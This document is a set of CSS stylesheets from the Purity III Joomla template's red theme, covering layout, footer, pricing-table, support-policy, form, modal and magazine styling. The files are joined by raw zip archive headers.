    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-md-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-md-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-md-12 {
    width: 100%;
  }
}
@media screen and (max-width: 991px) {
  .t3-spotlight:not(:root:root) .col-sm-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-sm-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-sm-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-sm-12 {
    width: 100%;
  }
}
@media screen and (max-width: 767px) {
  .t3-spotlight:not(:root:root) .col-xs-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-xs-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-xs-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-xs-12 {
    width: 100%;
  }
}
.t3-sl {
  padding-bottom: 40px;
  padding-top: 40px;
}
@media screen and (max-width: 767px) {
  .t3-sl {
    padding-bottom: 20px;
    padding-top: 20px;
  }
}
.t3-sl .t3-module {
  margin-bottom: 0;
}
.t3-sl .t3-module + .t3-module {
  margin-top: 20px;
}
@media screen and (min-width: 768px) {
  .t3-sl {
    padding-bottom: 60px;
    padding-top: 60px;
  }
}
.t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.t3-mainbody {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-content {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-sidebar {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-footer {
  background: #f7f7f7;
  color: #666666;
}
.t3-footer:before,
.t3-footer:after {
  display: table;
  content: " ";
}
.t3-footer:after {
  clear: both;
}
.t3-footer small {
  display: block;
  font-size: 100%;
}
.t3-footer-sl {
  padding: 20px 0;
}
.t3-footer-sl:before,
.t3-footer-sl:after {
  display: table;
  content: " ";
}
.t3-footer-sl:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .t3-footer-sl {
    padding: 40px 0;
  }
}
.t3-footer-sl .t3-module {
  background: #f7f7f7;
  color: #666666;
  margin-top: 10px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module .module-title {
  color: #444444;
  font-size: 18px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module ul {
  list-style: none;
  margin-left: 0;
  margin-bottom: 0;
  padding-left: 0;
}
.t3-footer-sl .t3-module ul > li {
  line-height: 24px;
}
.t3-footer-sl .t3-module ul > li > a {
  color: #666666;
}
.t3-footer-sl .t3-module ul > li > a:hover,
.t3-footer-sl .t3-module ul > li > a:active,
.t3-footer-sl .t3-module ul > li > a:focus {
  color: #666666;
}
#back-to-top {
  z-index: 999;
  position: fixed;
  right: 20px;
  top: auto;
}
#back-to-top.affix {
  bottom: 40px;
}
#back-to-top a {
  outline: none;
}
#back-to-top i {
  font-size: 28px;
}
.t3-copyright {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding: 40px 0 80px;
}
.t3-copyright:before,
.t3-copyright:after {
  display: table;
  content: " ";
}
.t3-copyright:after {
  clear: both;
}
.t3-copyright small {
  margin-bottom: 5px;
}
.copyright {
  margin-bottom: 20px;
}
.poweredby:before,
.poweredby:after {
  display: table;
  content: " ";
}
.poweredby:after {
  clear: both;
}
@media screen and (min-width: 991px) {
  .poweredby {
    text-align: right;
  }
}
.poweredby .t3-logo,
.poweredby .t3-logo-small {
  display: inline-block;
}
.mod-preview-info {
  z-index: 2000;
}
#ezblog-body .blog-text p,
#ezblog-body .blog-text li {
  line-height: 1.625;
}
.features-intro .t3-content {
  padding-top: 0;
  padding-bottom: 0;
}
.row-feature {
  border-top: 1px solid #eeeeee;
  padding: 40px 0;
  font-size: 16px;
  color: #666666;
  line-height: 1.5;
}
.page-masthead .row-feature {
  padding: 40px 0;
}
@media screen and (min-width: 992px) {
  .row-feature {
    padding: 60px 0;
  }
  .page-masthead .row-feature {
    padding: 100px 0;
  }
}
.row-feature h1,
.row-feature h2,
.row-feature h3 {
  line-height: 1.15;
  color: #444444;
}
.row-feature h1 {
  margin-top: 0;
  margin-bottom: 60px;
  font-weight: 300;
}
@media screen and (min-width: 768px) {
  .row-feature h1 {
    font-size: 84px;
  }
}
.row-feature h1 + p {
  margin-top: -55px;
}
.row-feature h2 {
  margin-top: 0;
  margin-bottom: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature h2 {
    font-size: 42px;
  }
}
.row-feature h3 {
  margin-top: 20px;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .row-feature h3 {
    font-size: 27.6px;
  }
}
.row-feature h3 + p {
  margin-top: -10px;
}
.row-feature .feature-ct {
  width: 100%;
  padding-top: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image + .feature-ct {
    width: 50%;
    float: right;
    padding-left: 20px;
  }
  .row-feature .pull-right.item-image + .feature-ct {
    width: 50%;
    float: left;
    padding-right: 20px;
  }
}
.row-feature.text-center {
  text-align: center;
}
.row-feature.row-feature-alt,
.row-feature:nth-child(even) {
  background: #f7f7f7;
}
.row-feature.row-feature-primary {
  background: #cc0000;
  color: #ffcccc;
}
.row-feature.row-feature-primary h1,
.row-feature.row-feature-primary h2,
.row-feature.row-feature-primary h3 {
  color: #ffffff;
}
.row-feature.row-feature-primary .feature-ct,
.row-feature.row-feature-primary p {
  color: #ffcccc;
}
.row-feature.row-feature-primary .btn-primary {
  border-color: #fff;
}
.row-feature.row-feature-primary + .row-feature-primary {
  border-top: 1px solid #990000;
}
.row-feature .row-feature-narrow {
  padding-top: 20px;
  padding-bottom: 20px;
}
.row-feature:first-child {
  border-top: 0;
}
.row-feature .item-image {
  width: 100%;
  float: none;
  margin-bottom: 20px;
}
.row-feature .item-image img {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image,
  .row-feature .pull-right.item-image {
    max-width: 50%;
    min-width: 25%;
    margin-bottom: 0;
  }
  .row-feature .pull-left.item-image {
    float: left;
    text-align: left;
    padding-right: 20px;
  }
  .row-feature .pull-right.item-image {
    float: right;
    text-align: right;
    padding-left: 20px;
  }
}
.row-feature .page-header {
  border: 0;
  margin: 0 0 20px;
  padding: 0;
}
.row-feature .jumbotron {
  background: transparent;
  position: relative;
  margin-top: 0;
  margin-bottom: 20px;
  padding-top: 0;
  padding-bottom: 0;
  text-align: center;
}
@media screen and (min-width: 768px) {
  .row-feature .jumbotron {
    margin-bottom: 60px;
  }
}
.row-feature .gallery .thumbnail {
  border: 0;
  padding: 0;
}
.row-feature .gallery .thumbnail a {
  display: block;
  border: 1px solid #eeeeee;
  padding: 3px;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.row-feature .gallery .thumbnail a img {
  width: 100%;
  padding: 0;
}
.row-feature .gallery .thumbnail a:hover,
.row-feature .gallery .thumbnail a:focus,
.row-feature .gallery .thumbnail a:active {
  border-color: #bbbbbb;
}
.row-feature .gallery .thumbnail a:hover img,
.row-feature .gallery .thumbnail a:focus img,
.row-feature .gallery .thumbnail a:active img {
  opacity: .7;
}
.support-policy .row-support-policy {
  margin-bottom: 20px;
}
.support-policy .policy-item {
  margin-bottom: 20px;
  border: 1px solid #eeeeee;
}
.support-policy .policy-item .col-type {
  position: relative;
  height: 100px;
  border-bottom: 1px solid #eeeeee;
  background: #f7f7f7;
}
.support-policy .policy-item .col-type h3 {
  position: absolute;
  bottom: 10px;
  left: 20px;
}
.support-policy .policy-item .col-detail {
  height: 200px;
  padding: 20px;
}
.support-policy .policy-item .col-level {
  height: 80px;
  background: #444444;
  color: #fff;
  position: relative;
}
.support-policy .policy-item .col-level .face,
.support-policy .policy-item .col-level .count-up,
.support-policy .policy-item .col-level > strong {
  height: 80px;
  line-height: 80px;
}
.support-policy .policy-item .col-level .level-info {
  width: 160px;
  position: absolute;
  left: 0;
  bottom: 0;
}
.support-policy .policy-item .col-level .level-info .face {
  background-image: url(../../../images/emoticons.png);
  background-repeat: no-repeat;
  background-color: rgba(0, 0, 0, 0.35);
  display: table-cell;
  width: 80px;
  border-right: 1px solid rgba(0, 0, 0, 0.2);
}
.support-policy .policy-item .col-level .level-info .count-up {
  width: 80px;
  border-right: 1px solid rgba(0, 0, 0, 0.2);
  background-color: rgba(0, 0, 0, 0.15);
  display: table-cell;
  vertical-align: middle;
  text-align: center;
  font-size: 18px;
  font-weight: bold;
}
.support-policy .policy-item .col-level strong {
  width: 100%;
  color: #ffffff;
  display: block;
  float: left;
  font-weight: bold;
  padding-left: 180px;
  font-size: 18px;
}
.support-policy .policy-item .col-level.level-1 strong {
  background: #3e9b52;
}
.support-policy .policy-item .col-level.level-1 .face {
  background-position: 0px 0px;
}
.support-policy .policy-item .col-level.level-2 strong {
  background: #2f773f;
}
.support-policy .policy-item .col-level.level-2 .face {
  background-position: 0px -80px;
}
.support-policy .policy-item .col-level.level-3 strong {
  background: #ffcc00;
}
.support-policy .policy-item .col-level.level-3 .face {
  background-position: 0px -160px;
}
.support-policy .policy-item .col-level.level-4 strong {
  background: #cca300;
}
.support-policy .policy-item .col-level.level-4 .face {
  background-position: 0px -240px;
}
.support-policy .policy-item .col-level.level-5 strong {
  background-color: #ff8800;
}
.support-policy .policy-item .col-level.level-5 .face {
  background-position: 0px -320px;
}
.support-policy .policy-item .col-level.level-6 strong {
  background: #cc0000;
}
.support-policy .policy-item .col-level.level-6 .face {
  background-position: 0px -400px;
}
.support-policy:hover {
  background: #ffffff;
  border-color: #eeeeee;
}
.support-policy:hover .level-info .face {
  top: -70px;
}
.support-policy:hover .level-info .count-up {
  bottom: 0;
}
.support-policy.style2 {
  margin-bottom: 60px;
}
.support-policy .row-heading {
  background: #444444;
  color: #ffffff;
  overflow: hidden;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading {
    display: table;
    width: 100%;
  }
}
.support-policy .row-heading > div {
  border-right: 1px solid #5e5e5e;
  font-size: 12px;
  font-weight: bold;
  padding: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading > div {
    font-size: 15px;
    display: table-cell;
  }
}
.support-policy .row-body {
  border-left: 1px solid #eeeeee;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body {
    display: table;
    width: 100%;
    margin-bottom: 0;
  }
}
.support-policy .row-body > div {
  border-right: 1px solid #eeeeee;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 20px;
  vertical-align: middle;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body > div {
    display: table-cell;
    float: none;
  }
}
.support-policy .row-body .col-type {
  background: #444444;
  color: #ffffff;
  font-size: 16px;
  font-weight: bold;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body .col-type {
    background: transparent;
    color: #444444;
  }
}
.support-policy .row-body .col-level {
  font-size: 32px;
  text-align: center;
}
.support-policy .row-body .col-status {
  border-bottom: 0;
}
.support-policy .row-body .col-status .face {
  background-image: url(../../../images/emoticons.png);
  background-repeat: no-repeat;
  display: block;
  height: 80px;
  margin: 0 auto;
  width: 80px;
}
.support-policy .row-body .col-status strong {
  color: #ffffff;
  display: block;
  padding: 3px 0;
  text-align: center;
}
.support-policy .row-body.level-1 .col-status {
  background: #3e9b52;
}
.support-policy .row-body.level-1 .col-status .face {
  background-position: 0px 0px;
}
.support-policy .row-body.level-2 .col-status {
  background: #44aa5a;
}
.support-policy .row-body.level-2 .col-status .face {
  background-position: 0px -80px;
}
.support-policy .row-body.level-3 .col-status {
  background: #4bb762;
}
.support-policy .row-body.level-3 .col-status .face {
  background-position: 0px -160px;
}
.support-policy .row-body.level-4 .col-status {
  background: #59bd6f;
}
.support-policy .row-body.level-4 .col-status .face {
  background-position: 0px -240px;
}
.support-policy .row-body.level-5 .col-status {
  background: #68c37b;
}
.support-policy .row-body.level-5 .col-status .face {
  background-position: 0px -320px;
}
.support-policy .row-body.level-6 .col-status {
  background: #77c888;
}
.support-policy .row-body.level-6 .col-status .face {
  background-position: 0px -400px;
}
.support-policy .row-alt {
  background: #f7f7f7;
}
.support-policy .support-yes {
  color: #3e9b52;
}
.support-policy .support-no {
  color: #e1e1e1;
}
.pricing-table {
  padding-top: 40px;
  padding-bottom: 100px;
}
.pricing-table .col {
  margin-bottom: 40px;
}
@media (min-width: 992px) {
  .pricing-table .col {
    margin-bottom: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.no-padding {
    padding: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.shadow {
    box-shadow: 0 0 0 5px rgba(0, 0, 0, 0.2);
  }
}
.pricing-table .col .big-number {
  display: inline-block;
  font-size: 70px;
}
.pricing-table .col .big-number sup {
  font-size: 28px;
  top: -1em;
}
.pricing-table .col .btn {
  font-size: 20px;
  padding: 10px 20px;
}
.pricing-table .col .col-header {
  background: #666666;
  color: #ffffff;
  padding: 10px 20px;
}
.pricing-table .col ul {
  border: 1px solid #eeeeee;
  border-bottom: 0;
  list-style: none;
  margin: 0;
  padding: 0;
}
.pricing-table .col ul li {
  border-bottom: 1px solid #eeeeee;
  font-size: 16px;
  padding: 10px 20px;
  text-align: center;
}
.pricing-table .col ul li.row1 {
  background: #f7f7f7;
}
.pricing-table .col ul li i {
  color: #3e9b52;
  font-size: 18px;
}
.pricing-table .col ul li.no i {
  color: #cc0000;
}
.pricing-table .col ul li.no {
  color: #999999;
  text-decoration: line-through;
}
.pricing-table .col .col-footer {
  background: #eeeeee;
  border: 1px solid #d5d5d5;
  padding: 20px;
}
.pricing-table .col-feature {
  z-index: 200;
}
@media screen and (min-width: 992px) {
  .pricing-table .col-feature {
    margin-top: -20px;
  }
}
.pricing-table .col-feature .col-header {
  background: #cc0000;
  padding: 20px 20px;
}
.pricing-table.style2 .col:first-child .col-header {
  border-radius: 5px 0 0 0;
}
.pricing-table.style2 .col:first-child .col-footer {
  border-radius: 0 0 0 5px;
}
.pricing-table.style2 .col:last-child .col-header {
  border-radius: 0 5px 0 0;
}
.pricing-table.style2 .col:last-child .col-footer {
  border-radius: 0 0 5px 0;
}
.pricing-table.style2 .col-feature {
  border-radius: 5px;
}
.pricing-table.style2 .col-feature .col-header {
  border-radius: 5px 5px 0 0;
}
.pricing-table.style2 .col-feature .col-footer {
  border-radius: 0 0 5px 5px;
}
.our-team .lead {
  margin-bottom: 60px;
}
.our-team .thumbnail {
  text-align: center;
  border: 0;
  padding: 0 20px;
}
.our-team .thumbnail .caption {
  padding-bottom: 20px;
}
.our-team .thumbnail h3 {
  margin-bottom: 5px;
}
.our-team .thumbnail .btn {
  border-radius: 50%;
  height: 32px;
  line-height: 32px;
  margin: 0 2px;
  padding: 0;
  text-align: center;
  width: 32px;
}
.our-team .thumbnail .btn:hover {
  background: #cc0000;
  border-color: #cc0000;
  color: #ffffff;
}
.control-group .controls script + .row-fluid {
  margin-left: 0;
}
.control-group .controls script + .row-fluid + .row-fluid {
  margin-left: 0;
}
.video-wrapper {
  position: relative;
  padding-bottom: 51%;
  padding-top: 30px;
  height: 0;
}
.video-wrapper iframe {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}

.sr-only,
.visually-hidden,
.visually-hidden-focusable:not(:focus):not(:focus-within) {
  position: absolute !important;
  width: 1px !important;
  height: 1px !important;
  padding: 0 !important;
  margin: -1px !important;
  overflow: hidden !important;
  clip: rect(0, 0, 0, 0) !important;
  white-space: nowrap !important;
  border: 0 !important;
}
.btn-close {
  background: #f0f0f0;
  border: 0;
  border-radius: 50%;
  color: #999;
  height: 32px;
  text-align: center;
  width: 32px;
  margin-left: auto;
  appearance: none;
  -moz-appearance: none;
  -webkit-appearance: none;
}
.btn-close::before {
  content: "\f00d";
  display: block;
  font-family: FontAwesome3 !important;
  font-size: 16px;
}
.btn-close:hover {
  cursor: pointer;
  color: #666;
}
.field-calendar .input-group input[type="text"] {
  border-right: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.field-calendar .input-group .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.field-calendar a:hover,
.field-calendar a:focus,
.field-calendar a:active {
  cursor: pointer;
}
joomla-field-custom.field-custom-wrapper .input-group {
  display: flex;
  align-items: stretch;
}
joomla-field-custom.field-custom-wrapper .input-group input[type="text"] {
  border-right: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn {
  display: flex;
  align-items: stretch;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn {
  border-radius: 0;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select {
  background-color: #2f7d32;
  border-color: #2f7d32;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:hover,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:focus,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:active {
  background-color: #296e2c;
  border-color: #296e2c;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear {
  background-color: #c52827;
  border: 1px solid #c52827;
  border-top-right-radius: 5px;
  border-bottom-right-radius: 5px;
  color: #fff;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:hover,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:focus,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:active {
  background-color: #ae2322;
  border-color: #c52827;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn span {
  line-height: 38px;
}
.input-group {
  position: relative;
  display: flex;
  flex-wrap: nowrap;
  align-items: stretch;
  width: 100%;
}
.input-group .form-control {
  width: auto;
}
.input-group .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.com-tags-tag.tag-category .filters {
  display: flex;
  align-items: center;
}
.users-profile-custom-joomlatoken .dl-horizontal dd {
  text-overflow: ellipsis;
  overflow: hidden;
  white-space: nowrap;
  width: 400px;
}
.com-finder .form-inline > label {
  margin-bottom: 10px;
}
.com-finder .input-group {
  display: flex;
  align-items: center;
}
.com-finder .input-group .btn:last-of-type {
  border-radius: 5px;
  margin-left: 10px;
}
.j40 joomla-field-media .input-group {
  max-width: 356px;
}
.j40 joomla-field-media .input-group input[type="text"] {
  border-right: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.j40 joomla-field-media .input-group .form-control {
  border-top-left-radius: 0;
  flex: 1;
}
.j40 joomla-field-media .input-group .btn {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.j40 joomla-field-media .input-group .icon-times::before {
  content: "\f00d";
  display: inline-block;
  font-weight: FontAwesome;
  font-size: 16px;
}
.j40 .form-control-feedback {
  font-size: 12px;
  font-weight: 400;
  top: auto;
  bottom: -28px;
  line-height: 1;
  width: auto;
  white-space: nowrap;
}
.j40 .com-newsfeeds-newsfeed__items {
  margin: 0;
  padding: 0;
  list-style: none;
}
.j40 .com-newsfeeds-newsfeed__items li {
  border-bottom: 1px solid #eeeeee;
  padding: 20px 0;
}
.j40 .com-newsfeeds-newsfeed__items .feed-link {
  margin-bottom: 20px;
}
.j40 figure {
  margin-bottom: 20px;
}
.j40 figure img {
  max-width: 100%;
}
.j40 #com-contact-form {
  margin-bottom: 20px;
}
.j40 .request-confirm fieldset legend {
  font-size: 16px;
  padding-bottom: 20px;
}
.j40 .article-aside .icons {
  float: right;
}
.j40 .article-aside .icons a {
  display: block;
  position: relative;
}
.j40 .article-aside .icons [role="tooltip"] {
  background-color: rgba(0, 0, 0, 0.6);
  border-radius: 3px;
  color: #fff;
  display: none;
  padding: 2px 4px;
  position: absolute;
  white-space: nowrap;
  right: 0;
  max-width: none;
}
.j40 .article-aside .icons:hover [role="tooltip"] {
  display: block;
}
.j40 .password-group .input-group {
  display: flex;
  flex-wrap: nowrap;
}
.j40 .password-group .input-group input {
  width: auto;
}
.j40 .edit.item-page .choices__inner {
  padding-right: 6px;
}
.j40 .edit.item-page .choices__inner button {
  background-color: rgba(255, 255, 255, 0.3);
  border-radius: 8px;
  border: 0;
  margin-left: 6px;
  padding: 1px 6px;
}
.j40 .edit.item-page .choices__inner button:hover,
.j40 .edit.item-page .choices__inner button:focus,
.j40 .edit.item-page .choices__inner button:active {
  background-color: rgba(255, 255, 255, 0.5);
  cursor: pointer;
}
.profile-edit .password-group .input-group input {
  min-width: 268px;
}
.profile-edit .control-group {
  margin-top: 20px;
}
.profile-edit .control-group .controls {
  float: none;
}
.j40 .joomla-modal.show,
.j42 .joomla-modal.show {
  background-color: rgba(0, 0, 0, 0.5);
  opacity: 1;
}
.j40 .joomla-modal.show .modal-dialog,
.j42 .joomla-modal.show .modal-dialog {
  top: 50%;
  transform: translateY(-50%);
}
.j40 .joomla-modal.show .modal-dialog .modal-content,
.j42 .joomla-modal.show .modal-dialog .modal-content {
  border-radius: 5px;
  box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);
}
.j40 .jviewport-width80,
.j42 .jviewport-width80 {
  width: 80vw;
}
.j40 .jviewport-height70,
.j42 .jviewport-height70 {
  height: 70vh;
}
.j40 .modal-header,
.j42 .modal-header {
  align-items: center;
  border-bottom: 1px solid #ddd;
  display: flex;
  padding: 12px 16px;
  justify-content: space-between;
}
.j40 .modal-header h3,
.j42 .modal-header h3 {
  font-size: 24px;
  font-weight: 500;
}
.j40 .modal-body,
.j42 .modal-body {
  overflow: hidden;
  padding: 0;
}
.j40 .iframe,
.j42 .iframe {
  border: 0;
  height: 100%;
  width: 100%;
}
.j40 [role=tooltip]:not(.show),
.j42 [role=tooltip]:not(.show) {
  right: 5em;
  z-index: 1070;
  display: none;
  max-width: 100%;
  padding: .5em;
  margin: .5em;
  color: #000;
  text-align: start;
  background: #fff;
  border: 1px solid #6d757e;
  border-radius: .25rem;
}
.j40 .container-popup [id="filter[search]-desc"],
.j42 .container-popup [id="filter[search]-desc"] {
  top: 100%;
  bottom: auto;
}
.j40 .btn-toolbar,
.j40 .js-stools-container-filters {
  display: flex;
  flex-wrap: wrap;
  justify-content: flex-end;
  align-items: center;
}
.j40 .ordering-select {
  display: flex;
  align-items: center;
}
.j40 .btn-group {
  margin-right: 10px;
}
.j40 .js-stools-container-filters {
  display: none;
  margin-top: 20px;
}
.j40 .js-stools-container-filters.js-stools-container-filters-visible {
  display: flex;
}
.j40 .js-stools-container-filters .js-stools-field-filter {
  margin-right: 10px;
}
.j40 .js-stools-container-filters .js-stools-field-filter:last-child {
  margin-right: 0;
}
.j40 .js-stools-container-filters .choices .choices__inner {
  border: 0;
  min-height: auto;
  padding: 0;
}
.j40 .js-stools-container-filters .choices .choices__inner input {
  margin-bottom: 0;
}
.j40 #contact-form label.required {
  position: relative;
}
.j40 #contact-form label.required .form-control-feedback {
  background: #fff;
  border-radius: .5rem;
  box-shadow: 2px 2px 5px rgba(0, 0, 0, 0.1);
  border: 1px solid #e5e7eb;
  display: flex;
  align-items: center;
  justify-content: center;
  padding: 0 .5rem;
  right: auto;
  left: calc(132%);
  bottom: calc(132%);
}
.contentpane .subhead {
  border-bottom: 1px solid #ddd;
  padding-bottom: 12px;
}
.contentpane .subhead .btn-toolbar {
  display: flex;
  gap: 10px;
  margin: 0;
}
.contentpane .subhead .btn-toolbar::before,
.contentpane .subhead .btn-toolbar::after {
  display: none;
}
.contentpane .media-sidebar {
  border-right: 1px solid #ddd;
}
.contentpane .media-toolbar {
  border-bottom: 1px solid #ddd;
  margin-right: 20px;
  padding-left: 20px;
}
.contentpane .media-toolbar .media-toolbar-icon {
  border-left: 1px solid #ddd;
}
.contentpane .media-toolbar .icon-search-minus,
.contentpane .media-toolbar .icon-search-plus {
  font-family: FontAwesome3;
}
.contentpane .media-toolbar .icon-search-minus::before,
.contentpane .media-toolbar .icon-search-plus::before {
  content: "\f010";
  display: block;
  font-size: 16px;
}
.contentpane .media-toolbar .icon-search-plus::before {
  content: "\f00e";
}
.com_contact fieldset.filters {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
}
.com_contact .com-contact-featured__filter {
  display: flex;
  flex-wrap: wrap;
}
.com_contact .display-limit {
  margin: 0;
}
.com_contact table.category {
  margin-top: 2rem;
}PKӜ�\LMN��*purity_iii/css/themes/red/layouts/docs.cssnu&1i�.docs-section {
  margin-bottom: 40px;
}
.docs-section .page-header {
  margin-bottom: 20px;
}
.docs-section .page-header h1 {
  font-size: 42px;
}
.example-type h1,
.example-type h2,
.example-type h3,
.example-type h4,
.example-type h5,
.example-type h6 {
  margin: 20px 0;
}
.example-colors .swatch-item {
  width: 100%;
  min-height: 100px;
  position: relative;
  background: #444444;
  color: #fff;
  margin-bottom: 20px;
}
.example-colors .swatch-item dl {
  width: 100%;
  position: absolute;
  bottom: 0;
  padding: 20px;
  margin: 0;
}
.example-colors .color-brand-primary {
  background: #cc0000;
}
.example-colors .color-brand-secondary {
  background: #3e9b52;
}
.example-colors .color-brand-success {
  background: #3e9b52;
}
.example-colors .color-brand-danger {
  background: #cc0000;
}
.example-colors .color-brand-warning {
  background: #ff8800;
}
.example-colors .color-brand-info {
  background: #0099cc;
}
.example-colors .color-gray-darker {
  background: #222222;
}
.example-colors .color-gray-dark {
  background: #444444;
}
.example-colors .color-gray {
  background: #666666;
}
.example-colors .color-gray-light {
  background: #999999;
  color: #444444;
}
.example-colors .color-gray-lighter {
  background: #eeeeee;
  color: #444444;
}
.example-colors .color-gray-lightest {
  background: #f7f7f7;
  color: #444444;
}
.example-buttons .btn,
.example-inputs .btn,
.example-buttons .form-control,
.example-inputs .form-control {
  width: 100%;
  margin-bottom: 20px;
}PKӜ�\�.��/purity_iii/css/themes/red/layouts/corporate.cssnu&1i�.corporate .slideshow {
  background: #f7f7f7;
  border-bottom: 1px solid #eeeeee;
  padding: 40px 0;
}
.corporate .t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.corporate .t3-sl-1 .t3-module,
.corporate .t3-sl-2 .t3-module,
.corporate .t3-sl-3 .t3-module {
  margin-bottom: 0;
}
.corporate .t3-sl-2 {
  padding: 0;
}
.corporate .carousel-caption {
  background: rgba(0, 0, 0, 0.3);
}
.corporate .t3-module .media {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 10px;
}
.corporate .t3-module .media:last-child {
  border: 0;
  padding: 0;
}
.corporate .items-leading {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
}
.corporate .items-row {
  border-bottom: 1px solid #eeeeee;
}
.corporate .items-row:last-child {
  border: 0;
}PKӜ�\����.purity_iii/css/themes/red/layouts/magazine.cssnu&1i�.magazine-item:before,
.magazine-featured-leading:before,
.magazine-featured-intro:before,
.magazine-category:before,
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  display: table;
  content: " ";
}
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  clear: both;
}
.magazine .page-subheader h2 {
  font-size: 42px;
}
.magazine-category-title {
  margin-bottom: 20px;
  font-size: 18px;
  background: #eeeeee;
  padding: 10px;
}
.magazine-category-title strong {
  font-weight: 600;
}
.magazine-category-title .fa {
  font-size: 14px;
  position: relative;
  top: -1px;
  left: 2px;
}
.magazine-category-title > a {
  display: inline-block;
  color: #444444;
  text-transform: uppercase;
}
.magazine-category-title > a:hover,
.magazine-category-title > a:active,
.magazine-category-title > a:focus {
  text-decoration: none;
  color: #cc0000;
}
.magazine-item .page-header {
  padding-bottom: 0;
  margin-bottom: 5px;
  border-bottom: 0;
}
.magazine-item .page-header h2 {
  margin: 0;
  font-size: 16px;
  line-height: 1.275;
  font-weight: 700;
}
.magazine-item .page-header h2 a:hover,
.magazine-item .page-header h2 a:active,
.magazine-item .page-header h2 a:focus {
  text-decoration: none;
}
.magazine-item .item-image {
  overflow: hidden;
}
.magazine-item .item-image,
.magazine-item .pull-left.item-image,
.magazine-item .pull-right.item-image {
  width: 100%;
  max-width: 100%;
  float: none !important;
  margin-bottom: 20px;
}
.magazine-item .item-image img,
.magazine-item .pull-left.item-image img,
.magazine-item .pull-right.item-image img,
.magazine-item .img_caption {
  width: 100% !important;
  max-width: 100%;
}
.magazine-item .article-aside {
  margin-top: 10px;
  margin-bottom: 10px;
}
.magazine-item .article-info {
  color: #999999;
  margin: 0;
  width: 100%;
}
.magazine-item .article-info dd {
  white-space: inherit;
}
.magazine-item-ct p:last-child {
  margin-bottom: 0;
}
.magazine-leading {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item .page-header h2 {
  font-size: 35px;
}
@media screen and (min-width: 768px) {
  .magazine-leading .magazine-item .item-image {
    max-height: 300px;
  }
}
.magazine-leading .magazine-item .magazine-item-ct {
  font-size: 16px;
}
.magazine-intro {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item .item-image {
  max-height: 120px;
}
.magazine-intro .magazine-item .item-image p.img_caption {
  display: none;
}
.magazine-links {
  margin-top: 40px;
}
.magazine-links::before {
  display: inline-block;
  content: "MORE NEWS";
  background: #444444;
  font-weight: normal;
  padding: 5px 10px;
  margin-bottom: 10px;
  color: #fff;
}
.magazine-links .link-item {
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0 9px;
}
.magazine-links .page-header {
  margin: 0;
}
.magazine-links .page-header h2 {
  font-size: 16px;
}
.magazine-links .article-aside {
  margin-top: 5px;
  margin-bottom: 0;
}
.magazine-featured-links {
  margin-top: 0;
  margin-bottom: 40px;
}
.magazine-category {
  margin-bottom: 40px;
}
